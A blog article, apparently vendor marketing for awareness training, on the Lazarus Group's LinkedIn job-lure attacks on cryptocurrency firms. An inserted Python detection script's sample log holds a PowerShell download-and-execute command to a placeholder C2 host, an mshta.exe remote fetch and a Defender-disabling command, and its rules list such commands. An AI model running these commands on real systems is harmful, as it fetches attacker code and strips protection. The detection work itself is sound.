Infamous Lazarus Group Targets Cryptocurrency Firms

The Lazarus group, a North Korean threat actor infamous for hacking campaigns all over the world, is back. This time the group is focusing its attention on cryptocurrency firms, sending staff at these financial organizations phishing messages via LinkedIn.

Security analysts and researchers have recently observed activity showing that the Lazarus group is broadening the scope of its malicious campaign. The group has taken to Microsoft-owned LinkedIn to send phishing messages to victims’ personal LinkedIn accounts.

The aim is to trick victims into disclosing their e-wallet credentials. With these credentials, the attackers can access the victims’ online bank accounts and cryptocurrency wallets and withdraw funds from them.

Researchers and security professionals have concluded that the Lazarus group has been active for years, and that this time its campaigns are more money-driven than information-driven.

This makes awareness of social engineering attack vectors all the more necessary, especially for organizations that operate within the targeted verticals and the financial sector.

Details on the Lazarus Group’s Recent Cyber Attack Campaign

Lazarus Group shifts to Cryptocurrency Firms

Lazarus Group operators targeted system administrators at a cryptocurrency firm. They used a phishing document attached to a message sent to the administrators’ personal LinkedIn accounts.

The phishing document posed as a genuine advertisement for a job at a blockchain technology company, one that closely matched the victims’ profiles and skill sets.

Intrigued by the job profile, the victims readily opened the phishing document that accompanied the message.

On opening the document, a notice informed the targets that the document was protected under GDPR (General Data Protection Regulation) and that access to its contents was therefore blocked.

It further told them that to gain access to the document they had to enable macros in Microsoft Word. As soon as a target enabled macros, the macro code the attackers had embedded in the document executed.

This malicious code created an LNK file that in turn launched mshta.exe, which opened a bit.ly link created back in May 2019.

Researchers examined the link enclosed in the phishing message and found that it had been accessed around 73 times from 19 different countries, including China, the US, and the UK.

According to security experts, the bit.ly link redirected victims to a site that ran a VBScript to profile the infected machine and collect information about it.

The collected data was then sent to a second command-and-control (C2) domain. This eventually led to the download and execution of a PowerShell script that retrieved the malicious payload from a third C2 domain.

Implementation of the Cyber Attack and Related Findings

North Korean hacker group APT (aka Lazarus)

The payload delivered by this attack chain installed several malicious implants on the victim’s system.

These implants in turn installed further malicious files, initiated C2 communication, executed arbitrary commands, and stole personal credentials and corporate information from the compromised machines.

Researchers also found out how the Lazarus group evaded detection: the attackers disabled Windows Defender monitoring on all of the victims’ machines.

However, despite these evasion measures, several commands executed through cmd.exe gave security professionals an opportunity to detect the intrusion.
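The chain described above (a macro-enabled Word document, an LNK file, mshta.exe fetching a bit.ly link, a PowerShell download stage, and Windows Defender being switched off) leaves a process-creation trail, which is what the cmd.exe commands mentioned here gave defenders. The following is an added example, not code from the original article or from any vendor: a small Python rule set run over a constructed process-creation log. The log format, field names, rule names and every sample value (hosts, paths, the bit.ly link, the C2 domain, the three-rule threshold) are assumptions made for this example.

```python
"""Detection rules for the LinkedIn-lure intrusion chain: Office spawning a
script host, mshta.exe loading remote content, a PowerShell download cradle,
and Windows Defender tampering.

Added example, not code from the original article or any vendor. The log
format, field names, rule names and all sample events below are constructed
for illustration; map the fields onto your own EDR or Sysmon Event ID 1
data before use."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed process-creation log, one event per line (assumed format):
# timestamp|host|parent_image|image|command_line
SAMPLE_EVENTS = r"""
2020-08-01T09:12:03Z|ws01|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|"WINWORD.EXE" /n "C:\Users\admin\Downloads\job_description.docm"
2020-08-01T09:12:41Z|ws01|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c start "" "C:\Users\admin\AppData\Local\Temp\update.lnk"
2020-08-01T09:12:42Z|ws01|C:\Windows\System32\cmd.exe|C:\Windows\System32\mshta.exe|mshta.exe https://bit.ly/PLACEHOLDER-LINK
2020-08-01T09:13:10Z|ws01|C:\Windows\System32\mshta.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://c2-placeholder.invalid/stage2')"
2020-08-01T09:13:15Z|ws01|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
2020-08-01T09:20:00Z|ws02|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe"}

# Command-line patterns for the individual stages (assumed rule content).
URL_IN_CMD = re.compile(r"https?://\S+", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b",
    re.IGNORECASE)
DEFENDER_TAMPER = re.compile(
    r"DisableRealtimeMonitoring|DisableAntiSpyware|DisableIOAVProtection"
    r"|sc(\.exe)?\s+stop\s+WinDefend|-ExclusionPath",
    re.IGNORECASE)


@dataclass
class Event:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str

    @property
    def parent_name(self) -> str:
        return self.parent.rsplit("\\", 1)[-1].lower()

    @property
    def image_name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    """Parse the pipe-separated log; the command line may itself contain '|'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append(Event(ts, host, parent, image, cmdline))
    return events


def evaluate(event: Event) -> list:
    """Return the names of every rule that fires on one event."""
    hits = []
    if event.parent_name in OFFICE_APPS and event.image_name in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")   # macro -> LNK/cmd/mshta
    if event.image_name == "mshta.exe" and URL_IN_CMD.search(event.cmdline):
        hits.append("mshta_remote_content")          # mshta fetching a link
    if event.image_name == "powershell.exe" and DOWNLOAD_CRADLE.search(event.cmdline):
        hits.append("powershell_download_cradle")    # next-stage download
    if DEFENDER_TAMPER.search(event.cmdline):
        hits.append("defender_tampering")            # Defender switched off
    return hits


def scan(text: str) -> list:
    """(host, timestamp, rule, image_name) for every rule hit, in log order."""
    return [(ev.host, ev.ts, rule, ev.image_name)
            for ev in parse_events(text) for rule in evaluate(ev)]


def hosts_with_chain(findings: list, min_rules: int = 3) -> list:
    """Hosts on which at least min_rules distinct stages fired (assumed threshold)."""
    seen = defaultdict(set)
    for host, _ts, rule, _image in findings:
        seen[host].add(rule)
    return sorted(h for h, rules in seen.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for host, ts, rule, image in hits:
        print(f"{ts} {host} {rule:<28} {image}")
    print("hosts with a likely full chain:", hosts_with_chain(hits))
```

Each rule is written to fire on one stage on its own, so a single mshta.exe launch with a URL is already worth a look; the per-host correlation in hosts_with_chain is what separates the full intrusion chain on ws01 from the benign activity on ws02. Disabling Windows Defender is the stage least likely to have a legitimate explanation on a workstation, so that rule is applied to every process regardless of its parent.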

A Brief History of the Group’s Previous Malicious Campaigns

Lazarus Group was linked to WannaCry Cyber Attack

The infamous Lazarus group goes by several names, such as Hidden Cobra and APT 38. This North Korean group of cybercriminals started its malicious activities back in 2009. The group was involved in the infamous WannaCry cyber attack of 2017 and has also been linked to earlier attacks such as the SWIFT bank attacks.

In 2014, Sony Pictures Entertainment was hacked by a group calling itself the “Guardians of Peace”, which leaked confidential information about the organization’s employees. Researchers later established that the Lazarus group was directly or indirectly involved in perpetrating the attack.

The Lazarus group’s tactics are evolving rapidly, from working with TrickBot operators to planting macOS spyware in applications. Recently, the group has adopted MATA (Multi-platform Targeted Malware Framework) to target Windows, macOS, and Linux operating systems.

Solutions for Avoiding Similar Attacks

As a CISO or CIO in a cryptocurrency firm, it is imperative to implement a well-rounded workplace security policy that includes an advanced cybersecurity awareness and training program.

Employees are usually an organization’s weakest link and the most frequent cause of data breaches. Because they are ill-informed about the attack vectors and social engineering methods used by attackers, employees easily fall prey to cyber attacks.

According to a 2020 survey, security analysts worldwide have concluded that more than 70% of all data breaches are a result of poor cyber-awareness among employees. 

A cybersecurity awareness training program begins by running realistic simulations of real-life cyber attacks against your employees. An unlimited number of attacks can be simulated to build security awareness.

The training process then follows, imparting knowledge about the various attack vectors through awareness content that gives detailed insight into them, visual presentations on attack identification, and video lectures and advisories on the same topics.

Regular cumulative assessments are taken to verify improvement and to build a better response to attacks. Such a program delivers detailed analysis of simulation reports on a dashboard to track results, and reports the progress employees have made through the assessments and knowledge sessions they have taken.

This is not the time to sit idle, but to solidify and strengthen the cybersecurity infrastructure in your organization, so that hacker groups like Lazarus cannot phish your employees and cause a major data breach.
